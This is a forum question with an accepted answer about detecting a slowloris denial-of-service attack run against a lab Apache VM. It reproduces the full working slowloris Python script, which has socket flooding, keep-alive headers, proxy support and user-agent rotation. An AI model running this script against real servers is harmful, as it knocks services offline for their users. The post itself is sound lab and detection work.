# How to identify slowloris attack specifically?

Tags: python, security, scapy

Slowloris is basically an HTTP Denial of Service attack that affects threaded servers. It works like this:

1. We start making lots of HTTP requests.
2. We send headers periodically (every ~15 seconds) to keep the connections open.
3. We never close the connection unless the server does so. If the server closes a connection, we create a new one keep doing the same thing.

This exhausts the servers thread pool and the server can't reply to other people.

I am using in a lab this slowloris code:

https://github.com/gkbrk/slowloris
http://pastebin.com/CsjTavjN

```
#!/usr/bin/python
import socket, random, time, sys, argparse, random, logging

parser = argparse.ArgumentParser(description="Slowloris, low bandwidth stress test tool for websites")
parser.add_argument('host',  nargs="?", help="Host to preform stress test on")
parser.add_argument('-p', '--port', default=80, help="Port of webserver, usually 80", type=int)
parser.add_argument('-s', '--sockets', default=150, help="Number of sockets to use in the test", type=int)
parser.add_argument('-v', '--verbose', dest="verbose", action="store_true", help="Increases logging")
parser.add_argument('-ua', '--randuseragents', dest="randuseragent", action="store_true", help="Randomizes user-agents with each request")
parser.add_argument('-x', '--useproxy', dest="useproxy", action="store_true", help="Use a SOCKS5 proxy for connecting")
parser.add_argument('--proxy-host', default="127.0.0.1", help="SOCKS5 proxy host")
parser.add_argument('--proxy-port', default="8080", help="SOCKS5 proxy port", type=int)
parser.set_defaults(verbose=False)
parser.set_defaults(randuseragent=False)
parser.set_defaults(useproxy=False)
args = parser.parse_args()

if len(sys.argv)<=1:
    parser.print_help()
    sys.exit(1)

if not args.host:
    print("Host required!")
    parser.print_help()
    sys.exit(1)

if args.useproxy:
    print("Using SOCKS5 proxy for connecting...")
    try:
        import socks
        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS5, args.proxy_host, args.proxy_port)
        socket.socket = socks.socksocket
    except ImportError:
        print("Socks Proxy Library Not Available!")
if args.verbose == True:
    logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.DEBUG)
else:
    logging.basicConfig(format="[%(asctime)s] %(message)s", datefmt="%d-%m-%Y %H:%M:%S", level=logging.INFO)

list_of_sockets = []
user_agents = [
    "Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.0",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0","Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_1) AppleWebKit/602.2.14 (KHTML, like Gecko) Version/10.0.1 Safari/602.2.14",
    "Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:49.0) Gecko/20100101 Firefox/49.0",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2840.71 Safari/537.36",
    "Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.143 Safari/537.36",
    "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Safari/602.1.50",
    "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.79 Safari/537.36 Edge/14.14393"
]

def init_socket(ip):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(4)
    s.connect((ip,args.port))

    s.send("GET /?{} HTTP/1.1\r\n".format(random.randint(0, 2000)).encode("utf-8"))
    if args.randuseragent:
        s.send("User-Agent: {}\r\n".format(random.choice(user_agents)).encode("utf-8"))
    else:
        s.send("User-Agent: {}\r\n".format(user_agents[0]).encode("utf-8"))
    s.send("{}\r\n".format("Accept-language: en-US,en,q=0.5").encode("utf-8"))
    return s

def main():
    ip = args.host
    socket_count = args.sockets
    logging.info("Attacking %s with %s sockets.", ip, socket_count)

    logging.info("Creating sockets...")
    for _ in range(socket_count):
        try:
            logging.debug("Creating socket nr %s", _)
            s = init_socket(ip)
        except socket.error:
            break
        list_of_sockets.append(s)

    while True:
        logging.info("Sending keep-alive headers... Socket count: %s", len(list_of_sockets))
        for s in list(list_of_sockets):
            try:
                s.send("X-a: {}\r\n".format(random.randint(1, 5000)).encode("utf-8"))
            except socket.error:
                list_of_sockets.remove(s)

        for _ in range(socket_count - len(list_of_sockets)):
            logging.debug("Recreating socket...")
            try:
                s = init_socket(ip)
                if s:
                    list_of_sockets.append(s)
            except socket.error:
                break
        time.sleep(15)

if __name__ == "__main__":
    main()
```

I have a virtual machine Ubuntu with Apache Server (IP 192.168.1.5)

I run slowloris to test the attack against 192.168.1.5

I need to "prove" that the attack worked and the attack is slowloris and no other attack. What could I do? What I need to observe in the server?
I have the PCAP file from the attack (network dump). What can I check in the captured file (PCAP file) to prove it? I will use Python!

Answer (score 3, accepted):

"What I need to observe in the server?"

Since slowloris will grab hold of the web server's sockets, this will prevent them for being used for new connections. Run the above script with a large number of sockets (~1024) and then take a look at the servers error log (apache2/error.log). You may see errors related to *MaxKeepAliveRequests*